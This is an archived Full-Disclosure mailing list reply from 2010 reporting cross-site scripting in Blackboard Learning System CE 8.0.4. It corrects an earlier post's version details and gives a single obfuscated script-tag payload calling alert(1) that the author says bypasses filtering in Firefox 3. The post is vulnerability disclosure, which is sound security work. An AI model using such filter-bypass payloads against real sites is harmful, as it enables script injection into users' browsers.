[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] xss in blackboard 8

To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] xss in blackboard 8
From: dave b <db.pub.mail@xxxxxxxxx>
Date: Sun, 17 Oct 2010 23:40:58 +1100

Woops the system Learning System - CE Enterprise License (Release CE
8.0.4)  I was testing on was originally 6.X something and got upgraded
so my (testing) previous posts still existed :/

In any-case here is an xss against firefox 3 that works against
Release CE 8.0.4:
<b><script<b></b><alert(1)</script </b>

--
How apt the poor are to be proud.               -- William Shakespeare, 
"Twelfth-Night"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] xss in blackboard 8
  - From: dave b

Prev by Date: [Full-disclosure] xss in blackboard 8
Next by Date: Re: [Full-disclosure] XSS in Oracle default fcgi-bin/echo
Previous by thread: [Full-disclosure] xss in blackboard 8
Next by thread: [Full-disclosure] rPSA-2010-0058-1 bzip2 bzip2-extras
Index(es):
- Date
- Thread